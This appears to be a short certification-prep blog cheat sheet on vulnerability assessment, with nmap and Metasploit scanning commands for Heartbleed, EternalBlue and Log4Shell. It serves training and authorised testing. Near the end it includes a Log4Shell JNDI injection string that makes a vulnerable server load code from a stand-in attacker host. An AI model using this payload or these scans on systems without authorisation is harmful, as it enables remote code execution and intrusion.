Vulnerability Assessment

eJPT

Vulnerability Assessment | eJPT

Conducting a thorough vulnerability assessment is a key component of the eLearnSecurity Junior Penetration Tester (eJPT) certification. This process involves identifying and evaluating potential vulnerabilities within a system. Here are commands to assess specific CVEs, showcasing the use of nmap scripts for targeted vulnerability discovery.

Table of contents [Show] [Hide]

1 CVE-2014-0160
- 1. 1 SSL Enumeration Ciphers
- 1. 2 Heartbleed (CVE-2014-0160 )
2 CVE-2017-0143 (EternalBlue)
- - 2. 0. 1 SMB Vulnerability Check
  - 2. 0. 2 Metasploit Module
3 CVE-2021-44228 (Log4J)
- 3. 1 Log4Shell Discovery

CVE-2014-0160

Explore SSL vulnerabilities with nmap scripts:

SSL Enumeration Ciphers

nmap 10.10.10.10 -sV -p 443 --script ssl-enum-ciphers

Heartbleed (CVE-2014-0160 )

nmap 10.10.10.10 -p 443 --script ssl-heartbleed

CVE-2017-0143 (EternalBlue)

Assess SMB vulnerabilities using nmap and Metasploit:

SMB Vulnerability Check

nmap 10.10.10.10 -p 445 --script smb-vuln-ms17-010

Metasploit Module

msf5> auxiliary/scanner/smb/smb_ms_17_010

CVE-2021-44228 (Log4J)

Discover potential Log4J vulnerabilities with nmap:

Log4Shell Discovery

nmap 10.10.10.10 -p 8080 --script log4shell.nse --script-args log4shell.callback-server=127.1.2.32:4435

The input field requires the following format

[field]> ${jndi:ldap<!--delete comment-->:://demo.domain.com:1389/myEVILcode}

Explore these commands to perform a vulnerability assessment, an essential skill for eLearnSecurity Junior Penetration Tester (eJPT) certification.

Check out: Servers & Services Enumeration | eJPT

1 min read

Feb 11, 2024

By Amr Elsagaei

Your email address will not be published. Required fields are marked *

Comment

Name

Website

Save my name, email, and website in this browser for the next time I comment.